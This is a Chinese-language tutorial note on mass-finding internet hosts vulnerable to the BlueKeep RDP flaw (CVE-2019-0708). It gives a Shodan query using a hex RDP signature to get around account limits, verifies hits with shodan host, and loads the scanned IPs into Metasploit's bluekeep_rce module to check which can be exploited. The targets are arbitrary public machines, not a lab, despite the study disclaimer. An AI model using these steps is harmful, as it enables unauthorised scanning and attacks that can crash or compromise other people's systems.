声明!
学习视频来自B站up主 泷羽sec 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!
目录
- 批量查找CVE-2019-0708漏洞
- 简述:
批量查找CVE-2019-0708漏洞
简述:
漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,导致机器蓝屏瘫痪。
输入命令:
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
用16进制是因为shodan search vuln:cve -2019-0708 命令对于学术账号无权限使用,需要注册更高一级账户
查到ip和对应端口后,通过 shodan host ip 来验证是否存在该漏洞,如下所示,这个ip则存在CVE-2019-0708漏洞
扫描下来的ip可以放到文档里(注意把端口删掉),利用windows自带远程桌面连接尝试连接
回到kali,输入msfconsole,再输入search 0708 查找此漏洞
输入以下命令启用这个模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
输入show options显示选项
然后输入 set rhosts file: 上述存放ip的文档路径
这里可以直接把文件托进命令面板
再输入check检查,带* 号的不能利用,带+号的可以利用
输入show targets可以查看利用的版本
输入exit退出
